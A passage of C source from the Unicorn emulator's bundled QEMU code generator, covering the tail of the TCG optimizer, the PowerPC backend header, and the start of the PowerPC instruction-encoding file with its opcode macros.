op->opc = INDEX_op_setcond_i32; op->args[1] = op->args[2]; op->args[2] = op->args[4]; op->args[3] = op->args[5]; } else if (op->args[5] == TCG_COND_EQ) { /* Simplify EQ comparisons where one of the pairs can be simplified. */ tmp = do_constant_folding_cond(s, INDEX_op_setcond_i32, op->args[1], op->args[3], TCG_COND_EQ); if (tmp == 0) { goto do_setcond_const; } else if (tmp == 1) { goto do_setcond_high; } tmp = do_constant_folding_cond(s, INDEX_op_setcond_i32, op->args[2], op->args[4], TCG_COND_EQ); if (tmp == 0) { goto do_setcond_high; } else if (tmp != 1) { goto do_default; } do_setcond_low: reset_temp(op->args[0]); arg_info(op->args[0])->mask = 1; op->opc = INDEX_op_setcond_i32; op->args[2] = op->args[3]; op->args[3] = op->args[5]; } else if (op->args[5] == TCG_COND_NE) { /* Simplify NE comparisons where one of the pairs can be simplified. */ tmp = do_constant_folding_cond(s, INDEX_op_setcond_i32, op->args[1], op->args[3], TCG_COND_NE); if (tmp == 0) { goto do_setcond_high; } else if (tmp == 1) { goto do_setcond_const; } tmp = do_constant_folding_cond(s, INDEX_op_setcond_i32, op->args[2], op->args[4], TCG_COND_NE); if (tmp == 0) { goto do_setcond_low; } else if (tmp == 1) { goto do_setcond_const; } goto do_default; } else { goto do_default; } break; case INDEX_op_call: if (!(op->args[nb_oargs + nb_iargs + 1] & (TCG_CALL_NO_READ_GLOBALS | TCG_CALL_NO_WRITE_GLOBALS))) { for (i = 0; i < nb_globals; i++) { if (test_bit(i, temps_used.l)) { reset_ts(&s->temps[i]); } } } goto do_reset_output; default: do_default: /* Default case: we know nothing about operation (or were unable to compute the operation result) so no propagation is done. We trash everything if the operation is the end of a basic block, otherwise we only trash the output args. "mask" is the non-zero bits mask for the first output arg. */ if (def->flags & TCG_OPF_BB_END) { bitmap_zero(temps_used.l, nb_temps); } else { do_reset_output: for (i = 0; i < nb_oargs; i++) { reset_temp(op->args[i]); /* Save the corresponding known-zero bits mask for the first output argument (only one supported so far). */ if (i == 0) { arg_info(op->args[i])->mask = mask; } } } break; } /* Eliminate duplicate and redundant fence instructions. */ if (prev_mb) { switch (opc) { case INDEX_op_mb: /* Merge two barriers of the same type into one, * or a weaker barrier into a stronger one, * or two weaker barriers into a stronger one. * mb X; mb Y => mb X|Y * mb; strl => mb; st * ldaq; mb => ld; mb * ldaq; strl => ld; mb; st * Other combinations are also merged into a strong * barrier. 
This is stricter than specified but for
                 * the purposes of TCG is better than not optimizing. */
                prev_mb->args[0] |= op->args[0];
                tcg_op_remove(s, op);
                break;

            default:
                /* Opcodes that end the block stop the optimization. */
                if ((def->flags & TCG_OPF_BB_END) == 0) {
                    break;
                }
                /* fallthru */
            case INDEX_op_qemu_ld_i32:
            case INDEX_op_qemu_ld_i64:
            case INDEX_op_qemu_st_i32:
            case INDEX_op_qemu_st_i64:
            case INDEX_op_call:
                /* Opcodes that touch guest memory stop the optimization. */
                prev_mb = NULL;
                break;
            }
        } else if (opc == INDEX_op_mb) {
            prev_mb = op;
        }
    }
}

unicorn-2.1.1/qemu/tcg/ppc/tcg-target.h

/*
 * Tiny Code Generator for QEMU
 *
 * Copyright (c) 2008 Fabrice Bellard
 *
 * Permission is hereby granted, free of charge, to any person obtaining a copy
 * of this software and associated documentation files (the "Software"), to deal
 * in the Software without restriction, including without limitation the rights
 * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 * copies of the Software, and to permit persons to whom the Software is
 * furnished to do so, subject to the following conditions:
 *
 * The above copyright notice and this permission notice shall be included in
 * all copies or substantial portions of the Software.
 *
 * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
 * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
 * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
 * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
 * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
 * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
 * THE SOFTWARE.
*/ #ifndef PPC_TCG_TARGET_H #define PPC_TCG_TARGET_H #ifdef _ARCH_PPC64 # define TCG_TARGET_REG_BITS 64 #else # define TCG_TARGET_REG_BITS 32 #endif #define TCG_TARGET_NB_REGS 64 #define TCG_TARGET_INSN_UNIT_SIZE 4 #define TCG_TARGET_TLB_DISPLACEMENT_BITS 16 typedef enum { TCG_REG_R0, TCG_REG_R1, TCG_REG_R2, TCG_REG_R3, TCG_REG_R4, TCG_REG_R5, TCG_REG_R6, TCG_REG_R7, TCG_REG_R8, TCG_REG_R9, TCG_REG_R10, TCG_REG_R11, TCG_REG_R12, TCG_REG_R13, TCG_REG_R14, TCG_REG_R15, TCG_REG_R16, TCG_REG_R17, TCG_REG_R18, TCG_REG_R19, TCG_REG_R20, TCG_REG_R21, TCG_REG_R22, TCG_REG_R23, TCG_REG_R24, TCG_REG_R25, TCG_REG_R26, TCG_REG_R27, TCG_REG_R28, TCG_REG_R29, TCG_REG_R30, TCG_REG_R31, TCG_REG_V0, TCG_REG_V1, TCG_REG_V2, TCG_REG_V3, TCG_REG_V4, TCG_REG_V5, TCG_REG_V6, TCG_REG_V7, TCG_REG_V8, TCG_REG_V9, TCG_REG_V10, TCG_REG_V11, TCG_REG_V12, TCG_REG_V13, TCG_REG_V14, TCG_REG_V15, TCG_REG_V16, TCG_REG_V17, TCG_REG_V18, TCG_REG_V19, TCG_REG_V20, TCG_REG_V21, TCG_REG_V22, TCG_REG_V23, TCG_REG_V24, TCG_REG_V25, TCG_REG_V26, TCG_REG_V27, TCG_REG_V28, TCG_REG_V29, TCG_REG_V30, TCG_REG_V31, TCG_REG_CALL_STACK = TCG_REG_R1, TCG_AREG0 = TCG_REG_R27 } TCGReg; typedef enum { tcg_isa_base, tcg_isa_2_06, tcg_isa_2_07, tcg_isa_3_00, } TCGPowerISA; extern TCGPowerISA have_isa; extern bool have_altivec; extern bool have_vsx; #define have_isa_2_06 (have_isa >= tcg_isa_2_06) #define have_isa_2_07 (have_isa >= tcg_isa_2_07) #define have_isa_3_00 (have_isa >= tcg_isa_3_00) /* optional instructions automatically implemented */ #define TCG_TARGET_HAS_ext8u_i32 0 /* andi */ #define TCG_TARGET_HAS_ext16u_i32 0 /* optional instructions */ #define TCG_TARGET_HAS_div_i32 1 #define TCG_TARGET_HAS_rem_i32 0 #define TCG_TARGET_HAS_rot_i32 1 #define TCG_TARGET_HAS_ext8s_i32 1 #define TCG_TARGET_HAS_ext16s_i32 1 #define TCG_TARGET_HAS_bswap16_i32 1 #define TCG_TARGET_HAS_bswap32_i32 1 #define TCG_TARGET_HAS_not_i32 1 #define TCG_TARGET_HAS_neg_i32 1 #define TCG_TARGET_HAS_andc_i32 1 #define TCG_TARGET_HAS_orc_i32 1 #define TCG_TARGET_HAS_eqv_i32 1 #define TCG_TARGET_HAS_nand_i32 1 #define TCG_TARGET_HAS_nor_i32 1 #define TCG_TARGET_HAS_clz_i32 1 #define TCG_TARGET_HAS_ctz_i32 have_isa_3_00 #define TCG_TARGET_HAS_ctpop_i32 have_isa_2_06 #define TCG_TARGET_HAS_deposit_i32 1 #define TCG_TARGET_HAS_extract_i32 1 #define TCG_TARGET_HAS_sextract_i32 0 #define TCG_TARGET_HAS_extract2_i32 0 #define TCG_TARGET_HAS_movcond_i32 1 #define TCG_TARGET_HAS_mulu2_i32 0 #define TCG_TARGET_HAS_muls2_i32 0 #define TCG_TARGET_HAS_muluh_i32 1 #define TCG_TARGET_HAS_mulsh_i32 1 #define TCG_TARGET_HAS_goto_ptr 1 #define TCG_TARGET_HAS_direct_jump 1 #if TCG_TARGET_REG_BITS == 64 #define TCG_TARGET_HAS_add2_i32 0 #define TCG_TARGET_HAS_sub2_i32 0 #define TCG_TARGET_HAS_extrl_i64_i32 0 #define TCG_TARGET_HAS_extrh_i64_i32 0 #define TCG_TARGET_HAS_div_i64 1 #define TCG_TARGET_HAS_rem_i64 0 #define TCG_TARGET_HAS_rot_i64 1 #define TCG_TARGET_HAS_ext8s_i64 1 #define TCG_TARGET_HAS_ext16s_i64 1 #define TCG_TARGET_HAS_ext32s_i64 1 #define TCG_TARGET_HAS_ext8u_i64 0 #define TCG_TARGET_HAS_ext16u_i64 0 #define TCG_TARGET_HAS_ext32u_i64 0 #define TCG_TARGET_HAS_bswap16_i64 1 #define TCG_TARGET_HAS_bswap32_i64 1 #define TCG_TARGET_HAS_bswap64_i64 1 #define TCG_TARGET_HAS_not_i64 1 #define TCG_TARGET_HAS_neg_i64 1 #define TCG_TARGET_HAS_andc_i64 1 #define TCG_TARGET_HAS_orc_i64 1 #define TCG_TARGET_HAS_eqv_i64 1 #define TCG_TARGET_HAS_nand_i64 1 #define TCG_TARGET_HAS_nor_i64 1 #define TCG_TARGET_HAS_clz_i64 1 #define TCG_TARGET_HAS_ctz_i64 have_isa_3_00 #define 
TCG_TARGET_HAS_ctpop_i64       have_isa_2_06
#define TCG_TARGET_HAS_deposit_i64     1
#define TCG_TARGET_HAS_extract_i64     1
#define TCG_TARGET_HAS_sextract_i64    0
#define TCG_TARGET_HAS_extract2_i64    0
#define TCG_TARGET_HAS_movcond_i64     1
#define TCG_TARGET_HAS_add2_i64        1
#define TCG_TARGET_HAS_sub2_i64        1
#define TCG_TARGET_HAS_mulu2_i64       0
#define TCG_TARGET_HAS_muls2_i64       0
#define TCG_TARGET_HAS_muluh_i64       1
#define TCG_TARGET_HAS_mulsh_i64       1
#endif

/*
 * While technically Altivec could support V64, it has no 64-bit store
 * instruction and substituting two 32-bit stores makes the generated
 * code quite large.
 */
#define TCG_TARGET_HAS_v64             have_vsx
#define TCG_TARGET_HAS_v128            have_altivec
#define TCG_TARGET_HAS_v256            0

#define TCG_TARGET_HAS_andc_vec        1
#define TCG_TARGET_HAS_orc_vec         have_isa_2_07
#define TCG_TARGET_HAS_not_vec         1
#define TCG_TARGET_HAS_neg_vec         have_isa_3_00
#define TCG_TARGET_HAS_abs_vec         0
#define TCG_TARGET_HAS_shi_vec         0
#define TCG_TARGET_HAS_shs_vec         0
#define TCG_TARGET_HAS_shv_vec         1
#define TCG_TARGET_HAS_cmp_vec         1
#define TCG_TARGET_HAS_mul_vec         1
#define TCG_TARGET_HAS_sat_vec         1
#define TCG_TARGET_HAS_minmax_vec      1
#define TCG_TARGET_HAS_bitsel_vec      have_vsx
#define TCG_TARGET_HAS_cmpsel_vec      0

void flush_icache_range(uintptr_t start, uintptr_t stop);
void tb_target_set_jmp_target(uintptr_t, uintptr_t, uintptr_t);

#define TCG_TARGET_DEFAULT_MO (0)
#define TCG_TARGET_HAS_MEMORY_BSWAP 1

#ifdef CONFIG_SOFTMMU
#define TCG_TARGET_NEED_LDST_LABELS
#endif
#define TCG_TARGET_NEED_POOL_LABELS

#endif

unicorn-2.1.1/qemu/tcg/ppc/tcg-target.inc.c

/*
 * Tiny Code Generator for QEMU
 *
 * Copyright (c) 2008 Fabrice Bellard
 *
 * Permission is hereby granted, free of charge, to any person obtaining a copy
 * of this software and associated documentation files (the "Software"), to deal
 * in the Software without restriction, including without limitation the rights
 * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 * copies of the Software, and to permit persons to whom the Software is
 * furnished to do so, subject to the following conditions:
 *
 * The above copyright notice and this permission notice shall be included in
 * all copies or substantial portions of the Software.
 *
 * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
 * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
 * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
 * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
 * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
 * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
 * THE SOFTWARE.
*/ #include "elf.h" #include "../tcg-pool.inc.c" #if defined _CALL_DARWIN || defined __APPLE__ #define TCG_TARGET_CALL_DARWIN #endif #ifdef _CALL_SYSV # define TCG_TARGET_CALL_ALIGN_ARGS 1 #endif /* For some memory operations, we need a scratch that isn't R0. For the AIX calling convention, we can re-use the TOC register since we'll be reloading it at every call. Otherwise R12 will do nicely as neither a call-saved register nor a parameter register. */ #ifdef _CALL_AIX # define TCG_REG_TMP1 TCG_REG_R2 #else # define TCG_REG_TMP1 TCG_REG_R12 #endif #define TCG_VEC_TMP1 TCG_REG_V0 #define TCG_VEC_TMP2 TCG_REG_V1 #define TCG_REG_TB TCG_REG_R31 #define USE_REG_TB (TCG_TARGET_REG_BITS == 64) /* Shorthand for size of a pointer. Avoid promotion to unsigned. */ #define SZP ((int)sizeof(void *)) /* Shorthand for size of a register. */ #define SZR (TCG_TARGET_REG_BITS / 8) #define TCG_CT_CONST_S16 0x100 #define TCG_CT_CONST_U16 0x200 #define TCG_CT_CONST_S32 0x400 #define TCG_CT_CONST_U32 0x800 #define TCG_CT_CONST_ZERO 0x1000 #define TCG_CT_CONST_MONE 0x2000 #define TCG_CT_CONST_WSZ 0x4000 static tcg_insn_unit *tb_ret_addr; TCGPowerISA have_isa; static bool have_isel; bool have_altivec; bool have_vsx; #ifndef CONFIG_SOFTMMU #define TCG_GUEST_BASE_REG 30 #endif #ifdef CONFIG_DEBUG_TCG static const char tcg_target_reg_names[TCG_TARGET_NB_REGS][4] = { "r0", "r1", "r2", "r3", "r4", "r5", "r6", "r7", "r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15", "r16", "r17", "r18", "r19", "r20", "r21", "r22", "r23", "r24", "r25", "r26", "r27", "r28", "r29", "r30", "r31", "v0", "v1", "v2", "v3", "v4", "v5", "v6", "v7", "v8", "v9", "v10", "v11", "v12", "v13", "v14", "v15", "v16", "v17", "v18", "v19", "v20", "v21", "v22", "v23", "v24", "v25", "v26", "v27", "v28", "v29", "v30", "v31", }; #endif static const int tcg_target_reg_alloc_order[] = { TCG_REG_R14, /* call saved registers */ TCG_REG_R15, TCG_REG_R16, TCG_REG_R17, TCG_REG_R18, TCG_REG_R19, TCG_REG_R20, TCG_REG_R21, TCG_REG_R22, TCG_REG_R23, TCG_REG_R24, TCG_REG_R25, TCG_REG_R26, TCG_REG_R27, TCG_REG_R28, TCG_REG_R29, TCG_REG_R30, TCG_REG_R31, TCG_REG_R12, /* call clobbered, non-arguments */ TCG_REG_R11, TCG_REG_R2, TCG_REG_R13, TCG_REG_R10, /* call clobbered, arguments */ TCG_REG_R9, TCG_REG_R8, TCG_REG_R7, TCG_REG_R6, TCG_REG_R5, TCG_REG_R4, TCG_REG_R3, /* V0 and V1 reserved as temporaries; V20 - V31 are call-saved */ TCG_REG_V2, /* call clobbered, vectors */ TCG_REG_V3, TCG_REG_V4, TCG_REG_V5, TCG_REG_V6, TCG_REG_V7, TCG_REG_V8, TCG_REG_V9, TCG_REG_V10, TCG_REG_V11, TCG_REG_V12, TCG_REG_V13, TCG_REG_V14, TCG_REG_V15, TCG_REG_V16, TCG_REG_V17, TCG_REG_V18, TCG_REG_V19, }; static const int tcg_target_call_iarg_regs[] = { TCG_REG_R3, TCG_REG_R4, TCG_REG_R5, TCG_REG_R6, TCG_REG_R7, TCG_REG_R8, TCG_REG_R9, TCG_REG_R10 }; static const int tcg_target_call_oarg_regs[] = { TCG_REG_R3, TCG_REG_R4 }; static const int tcg_target_callee_save_regs[] = { #ifdef TCG_TARGET_CALL_DARWIN TCG_REG_R11, #endif TCG_REG_R14, TCG_REG_R15, TCG_REG_R16, TCG_REG_R17, TCG_REG_R18, TCG_REG_R19, TCG_REG_R20, TCG_REG_R21, TCG_REG_R22, TCG_REG_R23, TCG_REG_R24, TCG_REG_R25, TCG_REG_R26, TCG_REG_R27, /* currently used for the global env */ TCG_REG_R28, TCG_REG_R29, TCG_REG_R30, TCG_REG_R31 }; static inline bool in_range_b(tcg_target_long target) { return target == sextract64(target, 0, 26); } static uint32_t reloc_pc24_val(tcg_insn_unit *pc, tcg_insn_unit *target) { ptrdiff_t disp = tcg_ptr_byte_diff(target, pc); tcg_debug_assert(in_range_b(disp)); return disp & 0x3fffffc; } static bool 
reloc_pc24(tcg_insn_unit *pc, tcg_insn_unit *target) { ptrdiff_t disp = tcg_ptr_byte_diff(target, pc); if (in_range_b(disp)) { *pc = (*pc & ~0x3fffffc) | (disp & 0x3fffffc); return true; } return false; } static uint16_t reloc_pc14_val(tcg_insn_unit *pc, tcg_insn_unit *target) { ptrdiff_t disp = tcg_ptr_byte_diff(target, pc); tcg_debug_assert(disp == (int16_t) disp); return disp & 0xfffc; } static bool reloc_pc14(tcg_insn_unit *pc, tcg_insn_unit *target) { ptrdiff_t disp = tcg_ptr_byte_diff(target, pc); if (disp == (int16_t) disp) { *pc = (*pc & ~0xfffc) | (disp & 0xfffc); return true; } return false; } /* parse target specific constraints */ static const char *target_parse_constraint(TCGArgConstraint *ct, const char *ct_str, TCGType type) { switch (*ct_str++) { case 'A': case 'B': case 'C': case 'D': ct->ct |= TCG_CT_REG; tcg_regset_set_reg(ct->u.regs, 3 + ct_str[0] - 'A'); break; case 'r': ct->ct |= TCG_CT_REG; ct->u.regs = 0xffffffff; break; case 'v': ct->ct |= TCG_CT_REG; ct->u.regs = 0xffffffff00000000ull; break; case 'L': /* qemu_ld constraint */ ct->ct |= TCG_CT_REG; ct->u.regs = 0xffffffff; tcg_regset_reset_reg(ct->u.regs, TCG_REG_R3); #ifdef CONFIG_SOFTMMU tcg_regset_reset_reg(ct->u.regs, TCG_REG_R4); tcg_regset_reset_reg(ct->u.regs, TCG_REG_R5); #endif break; case 'S': /* qemu_st constraint */ ct->ct |= TCG_CT_REG; ct->u.regs = 0xffffffff; tcg_regset_reset_reg(ct->u.regs, TCG_REG_R3); #ifdef CONFIG_SOFTMMU tcg_regset_reset_reg(ct->u.regs, TCG_REG_R4); tcg_regset_reset_reg(ct->u.regs, TCG_REG_R5); tcg_regset_reset_reg(ct->u.regs, TCG_REG_R6); #endif break; case 'I': ct->ct |= TCG_CT_CONST_S16; break; case 'J': ct->ct |= TCG_CT_CONST_U16; break; case 'M': ct->ct |= TCG_CT_CONST_MONE; break; case 'T': ct->ct |= TCG_CT_CONST_S32; break; case 'U': ct->ct |= TCG_CT_CONST_U32; break; case 'W': ct->ct |= TCG_CT_CONST_WSZ; break; case 'Z': ct->ct |= TCG_CT_CONST_ZERO; break; default: return NULL; } return ct_str; } /* test if a constant matches the constraint */ static int tcg_target_const_match(tcg_target_long val, TCGType type, const TCGArgConstraint *arg_ct) { int ct = arg_ct->ct; if (ct & TCG_CT_CONST) { return 1; } /* The only 32-bit constraint we use aside from TCG_CT_CONST is TCG_CT_CONST_S16. */ if (type == TCG_TYPE_I32) { val = (int32_t)val; } if ((ct & TCG_CT_CONST_S16) && val == (int16_t)val) { return 1; } else if ((ct & TCG_CT_CONST_U16) && val == (uint16_t)val) { return 1; } else if ((ct & TCG_CT_CONST_S32) && val == (int32_t)val) { return 1; } else if ((ct & TCG_CT_CONST_U32) && val == (uint32_t)val) { return 1; } else if ((ct & TCG_CT_CONST_ZERO) && val == 0) { return 1; } else if ((ct & TCG_CT_CONST_MONE) && val == -1) { return 1; } else if ((ct & TCG_CT_CONST_WSZ) && val == (type == TCG_TYPE_I32 ? 
32 : 64)) { return 1; } return 0; } #define OPCD(opc) ((opc)<<26) #define XO19(opc) (OPCD(19)|((opc)<<1)) #define MD30(opc) (OPCD(30)|((opc)<<2)) #define MDS30(opc) (OPCD(30)|((opc)<<1)) #define XO31(opc) (OPCD(31)|((opc)<<1)) #define XO58(opc) (OPCD(58)|(opc)) #define XO62(opc) (OPCD(62)|(opc)) #define VX4(opc) (OPCD(4)|(opc)) #define B OPCD( 18) #define BC OPCD( 16) #define LBZ OPCD( 34) #define LHZ OPCD( 40) #define LHA OPCD( 42) #define LWZ OPCD( 32) #define LWZUX XO31( 55) #define STB OPCD( 38) #define STH OPCD( 44) #define STW OPCD( 36) #define STD XO62( 0) #define STDU XO62( 1) #define STDX XO31(149) #define LD XO58( 0) #define LDX XO31( 21) #define LDU XO58( 1) #define LDUX XO31( 53) #define LWA XO58( 2) #define LWAX XO31(341) #define ADDIC OPCD( 12) #define ADDI OPCD( 14) #define ADDIS OPCD( 15) #define ORI OPCD( 24) #define ORIS OPCD( 25) #define XORI OPCD( 26) #define XORIS OPCD( 27) #define ANDI OPCD( 28) #define ANDIS OPCD( 29) #define MULLI OPCD( 7) #define CMPLI OPCD( 10) #define CMPI OPCD( 11) #define SUBFIC OPCD( 8) #define LWZU OPCD( 33) #define STWU OPCD( 37) #define RLWIMI OPCD( 20) #define RLWINM OPCD( 21) #define RLWNM OPCD( 23) #define RLDICL MD30( 0) #define RLDICR MD30( 1) #define RLDIMI MD30( 3) #define RLDCL MDS30( 8) #define BCLR XO19( 16) #define BCCTR XO19(528) #define CRAND XO19(257) #define CRANDC XO19(129) #define CRNAND XO19(225) #define CROR XO19(449) #define CRNOR XO19( 33) #define EXTSB XO31(954) #define EXTSH XO31(922) #define EXTSW XO31(986) #define ADD XO31(266) #define ADDE XO31(138) #define ADDME XO31(234) #define ADDZE XO31(202) #define ADDC XO31( 10) #define AND XO31( 28) #define SUBF XO31( 40) #define SUBFC XO31( 8) #define SUBFE XO31(136) #define SUBFME XO31(232) #define SUBFZE XO31(200) #define OR XO31(444) #define XOR XO31(316) #define MULLW XO31(235) #define MULHW XO31( 75) #define MULHWU XO31( 11) #define DIVW XO31(491) #define DIVWU XO31(459) #define CMP XO31( 0) #define CMPL XO31( 32) #define LHBRX XO31(790) #define LWBRX XO31(534) #define LDBRX XO31(532) #define STHBRX XO31(918) #define STWBRX XO31(662) #define STDBRX XO31(660) #define MFSPR XO31(339) #define MTSPR XO31(467) #define SRAWI XO31(824) #define NEG XO31(104) #define MFCR XO31( 19) #define MFOCRF (MFCR | (1u << 20)) #define NOR XO31(124) #define CNTLZW XO31( 26) #define CNTLZD XO31( 58) #define CNTTZW XO31(538) #define CNTTZD XO31(570) #define CNTPOPW XO31(378) #define CNTPOPD XO31(506) #define ANDC XO31( 60) #define ORC XO31(412) #define EQV XO31(284) #define NAND XO31(476) #define ISEL XO31( 15) #define MULLD XO31(233) #define MULHD XO31( 73) #define MULHDU XO31( 9) #define DIVD XO31(489) #define DIVDU XO31(457) #define LBZX XO31( 87) #define LHZX XO31(279) #define LHAX XO31(343) #define LWZX XO31( 23) #define STBX XO31(215) #define STHX XO31(407) #define STWX XO31(151) #define EIEIO XO31(854) #define HWSYNC XO31(598) #define LWSYNC (HWSYNC | (1u << 21)) #define SPR(a, b) ((((a)<<5)|(b))<<11) #define LR SPR(8, 0) #define CTR SPR(9, 0) #define SLW XO31( 24) #define SRW XO31(536) #define SRAW XO31(792) #define SLD XO31( 27) #define SRD XO31(539) #define SRAD XO31(794) #define SRADI XO31(413<<1) #define TW XO31( 4) #define TRAP (TW | TO(31)) #define NOP ORI /* ori 0,0,0 */ #define LVX XO31(103) #define LVEBX XO31(7) #define LVEHX XO31(39) #define LVEWX XO31(71) #define LXSDX (XO31(588) | 1) /* v2.06, force tx=1 */ #define LXVDSX (XO31(332) | 1) /* v2.06, force tx=1 */ #define LXSIWZX (XO31(12) | 1) /* v2.07, force tx=1 */ #define LXV (OPCD(61) | 8 | 1) /* v3.00, force tx=1 */ 
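/*
 * A note on these opcode templates: each #define bakes the primary opcode
 * and any extended-opcode bits into a single 32-bit word, and the register
 * fields are OR'ed in later via the RT/RA/RB macros further down.  As an
 * illustration (values taken from this file, result checked against the
 * Power ISA):
 *
 *     ADD = XO31(266) = (31 << 26) | (266 << 1) = 0x7c000214
 *     tcg_out32(s, ADD | TAB(TCG_REG_R3, TCG_REG_R4, TCG_REG_R5))
 *
 * emits "add r3, r4, r5".  For the VSX loads/stores above and below, the
 * explicit "| 1" forces the TX/SX bit, so the 5-bit T/S field names VSRs
 * 32-63, i.e. the Altivec register file that TCG allocates from.
 */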
#define LXSD (OPCD(57) | 2) /* v3.00 */ #define LXVWSX (XO31(364) | 1) /* v3.00, force tx=1 */ #define STVX XO31(231) #define STVEWX XO31(199) #define STXSDX (XO31(716) | 1) /* v2.06, force sx=1 */ #define STXSIWX (XO31(140) | 1) /* v2.07, force sx=1 */ #define STXV (OPCD(61) | 8 | 5) /* v3.00, force sx=1 */ #define STXSD (OPCD(61) | 2) /* v3.00 */ #define VADDSBS VX4(768) #define VADDUBS VX4(512) #define VADDUBM VX4(0) #define VADDSHS VX4(832) #define VADDUHS VX4(576) #define VADDUHM VX4(64) #define VADDSWS VX4(896) #define VADDUWS VX4(640) #define VADDUWM VX4(128) #define VADDUDM VX4(192) /* v2.07 */ #define VSUBSBS VX4(1792) #define VSUBUBS VX4(1536) #define VSUBUBM VX4(1024) #define VSUBSHS VX4(1856) #define VSUBUHS VX4(1600) #define VSUBUHM VX4(1088) #define VSUBSWS VX4(1920) #define VSUBUWS VX4(1664) #define VSUBUWM VX4(1152) #define VSUBUDM VX4(1216) /* v2.07 */ #define VNEGW (VX4(1538) | (6 << 16)) /* v3.00 */ #define VNEGD (VX4(1538) | (7 << 16)) /* v3.00 */ #define VMAXSB VX4(258) #define VMAXSH VX4(322) #define VMAXSW VX4(386) #define VMAXSD VX4(450) /* v2.07 */ #define VMAXUB VX4(2) #define VMAXUH VX4(66) #define VMAXUW VX4(130) #define VMAXUD VX4(194) /* v2.07 */ #define VMINSB VX4(770) #define VMINSH VX4(834) #define VMINSW VX4(898) #define VMINSD VX4(962) /* v2.07 */ #define VMINUB VX4(514) #define VMINUH VX4(578) #define VMINUW VX4(642) #define VMINUD VX4(706) /* v2.07 */ #define VCMPEQUB VX4(6) #define VCMPEQUH VX4(70) #define VCMPEQUW VX4(134) #define VCMPEQUD VX4(199) /* v2.07 */ #define VCMPGTSB VX4(774) #define VCMPGTSH VX4(838) #define VCMPGTSW VX4(902) #define VCMPGTSD VX4(967) /* v2.07 */ #define VCMPGTUB VX4(518) #define VCMPGTUH VX4(582) #define VCMPGTUW VX4(646) #define VCMPGTUD VX4(711) /* v2.07 */ #define VCMPNEB VX4(7) /* v3.00 */ #define VCMPNEH VX4(71) /* v3.00 */ #define VCMPNEW VX4(135) /* v3.00 */ #define VSLB VX4(260) #define VSLH VX4(324) #define VSLW VX4(388) #define VSLD VX4(1476) /* v2.07 */ #define VSRB VX4(516) #define VSRH VX4(580) #define VSRW VX4(644) #define VSRD VX4(1732) /* v2.07 */ #define VSRAB VX4(772) #define VSRAH VX4(836) #define VSRAW VX4(900) #define VSRAD VX4(964) /* v2.07 */ #define VRLB VX4(4) #define VRLH VX4(68) #define VRLW VX4(132) #define VRLD VX4(196) /* v2.07 */ #define VMULEUB VX4(520) #define VMULEUH VX4(584) #define VMULEUW VX4(648) /* v2.07 */ #define VMULOUB VX4(8) #define VMULOUH VX4(72) #define VMULOUW VX4(136) /* v2.07 */ #define VMULUWM VX4(137) /* v2.07 */ #define VMSUMUHM VX4(38) #define VMRGHB VX4(12) #define VMRGHH VX4(76) #define VMRGHW VX4(140) #define VMRGLB VX4(268) #define VMRGLH VX4(332) #define VMRGLW VX4(396) #define VPKUHUM VX4(14) #define VPKUWUM VX4(78) #define VAND VX4(1028) #define VANDC VX4(1092) #define VNOR VX4(1284) #define VOR VX4(1156) #define VXOR VX4(1220) #define VEQV VX4(1668) /* v2.07 */ #define VNAND VX4(1412) /* v2.07 */ #define VORC VX4(1348) /* v2.07 */ #define VSPLTB VX4(524) #define VSPLTH VX4(588) #define VSPLTW VX4(652) #define VSPLTISB VX4(780) #define VSPLTISH VX4(844) #define VSPLTISW VX4(908) #define VSLDOI VX4(44) #define XXPERMDI (OPCD(60) | (10 << 3) | 7) /* v2.06, force ax=bx=tx=1 */ #define XXSEL (OPCD(60) | (3 << 4) | 0xf) /* v2.06, force ax=bx=cx=tx=1 */ #define XXSPLTIB (OPCD(60) | (360 << 1) | 1) /* v3.00, force tx=1 */ #define MFVSRD (XO31(51) | 1) /* v2.07, force sx=1 */ #define MFVSRWZ (XO31(115) | 1) /* v2.07, force sx=1 */ #define MTVSRD (XO31(179) | 1) /* v2.07, force tx=1 */ #define MTVSRWZ (XO31(243) | 1) /* v2.07, force tx=1 */ #define MTVSRDD (XO31(435) | 1) 
/* v3.00, force tx=1 */ #define MTVSRWS (XO31(403) | 1) /* v3.00, force tx=1 */ #define RT(r) ((r)<<21) #define RS(r) ((r)<<21) #define RA(r) ((r)<<16) #define RB(r) ((r)<<11) #define TO(t) ((t)<<21) #define SH(s) ((s)<<11) #define MB(b) ((b)<<6) #define ME(e) ((e)<<1) #define BO(o) ((o)<<21) #define MB64(b) ((b)<<5) #define FXM(b) (1 << (19 - (b))) #define VRT(r) (((r) & 31) << 21) #define VRA(r) (((r) & 31) << 16) #define VRB(r) (((r) & 31) << 11) #define VRC(r) (((r) & 31) << 6) #define LK 1 #define TAB(t, a, b) (RT(t) | RA(a) | RB(b)) #define SAB(s, a, b) (RS(s) | RA(a) | RB(b)) #define TAI(s, a, i) (RT(s) | RA(a) | ((i) & 0xffff)) #define SAI(s, a, i) (RS(s) | RA(a) | ((i) & 0xffff)) #define BF(n) ((n)<<23) #define BI(n, c) (((c)+((n)*4))<<16) #define BT(n, c) (((c)+((n)*4))<<21) #define BA(n, c) (((c)+((n)*4))<<16) #define BB(n, c) (((c)+((n)*4))<<11) #define BC_(n, c) (((c)+((n)*4))<<6) #define BO_COND_TRUE BO(12) #define 